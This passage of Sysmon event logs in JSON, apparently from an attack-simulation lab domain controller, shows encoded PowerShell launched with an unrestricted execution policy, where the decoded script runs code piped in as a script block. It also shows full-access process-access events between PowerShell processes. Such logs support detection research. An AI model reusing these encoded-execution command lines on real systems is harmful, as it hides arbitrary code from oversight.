JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","ParentProcessId":"1164","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nSourceProcessId: 1164\r\nSourceThreadId: 2900\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+986a2f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+985f50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b0485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b62d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b381a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b446db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b442ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+985f50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b2ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b2a0f9(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","SourceProcessId":"1164","SourceThreadId":"2900","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+986a2f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+985f50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b0485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b62d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b381a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b446db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b442ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+985f50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b2ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b2a0f9(wow64)","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\R